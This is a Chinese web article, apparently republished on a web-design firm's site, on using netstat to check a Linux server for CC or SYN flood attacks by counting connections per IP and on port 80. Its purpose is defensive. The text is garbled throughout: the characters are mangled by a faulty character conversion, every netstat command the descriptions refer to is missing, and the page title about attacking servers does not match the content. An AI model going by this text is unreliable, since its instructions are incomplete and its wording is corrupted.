Linux 系統(tǒng)如何通過(guò) netstat 命令查看連接數(shù)判斷攻擊

很多時(shí)候我們會(huì)遇到服務(wù)器遭受 cc 或 syn 等攻擊，如果發(fā)現(xiàn)自己的網(wǎng)站訪問(wèn)異常緩慢且流量異常?？梢允褂孟到y(tǒng)內(nèi)置 netstat 命令 簡(jiǎn)單判斷一下服務(wù)器是否被攻擊。常用的 netstat 命令

該命令將顯示所有活動(dòng)的網(wǎng)絡(luò)連接。

查看同時(shí)連接到哪個(gè)服務(wù)器 IP 比較多，cc 攻擊用。使用雙網(wǎng)卡或多網(wǎng)卡可用。

查看哪些 IP 連接到服務(wù)器連接多，可以查看連接異常 IP。

顯示所有 80 端口的網(wǎng)絡(luò)連接并排序。這里的 80 端口是 http 端口，所以可以用來(lái)監(jiān)控 web 服務(wù)。如果看到同一個(gè) IP 有大量連接的話就可以判定單點(diǎn)流量攻擊了。

這個(gè)命令可以查找出當(dāng)前服務(wù)器有多少個(gè)活動(dòng)的 SYNC_REC 連接。正常來(lái)說(shuō)這個(gè)值很小，最好小于 5。 當(dāng)有 Dos 攻擊或的時(shí)候，這個(gè)值相當(dāng)?shù)母摺５怯行┎l(fā)很高的服務(wù)器，這個(gè)值確實(shí)是很高，因此很高并不能說(shuō)明一定被攻擊。

列出所有連接過(guò)的 IP 地址。

列出所有發(fā)送 SYN_REC 連接節(jié)點(diǎn)的 IP 地址。

使用 netstat 命令計(jì)算每個(gè)主機(jī)連接到本機(jī)的連接數(shù)。

列出所有連接到本機(jī)的 UDP 或者 TCP 連接的 IP 數(shù)量。

檢查 ESTABLISHED 連接并且列出每個(gè) IP 地址的連接數(shù)量。

列出所有連接到本機(jī) 80 端口的 IP 地址和其連接數(shù)。80 端口一般是用來(lái)處理 HTTP 網(wǎng)頁(yè)請(qǐng)求。

顯示連接 80 端口前 10 的 ip，并顯示每個(gè) IP 的連接數(shù)。這里的 80 端口是 http 端口，所以可以用來(lái)監(jiān)控 web 服務(wù)。如果看到同一個(gè) IP 有大量連接的話就可以判定單點(diǎn)流量攻擊了。

網(wǎng)頁(yè)名稱(chēng)：linux攻擊服務(wù)器命令 如何攻擊linux服務(wù)器
文章網(wǎng)址：http://muchs.cn/article40/ddcioeo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供靜態(tài)網(wǎng)站、定制網(wǎng)站、網(wǎng)站導(dǎo)航、軟件開(kāi)發(fā)、品牌網(wǎng)站設(shè)計(jì)、營(yíng)銷(xiāo)型網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)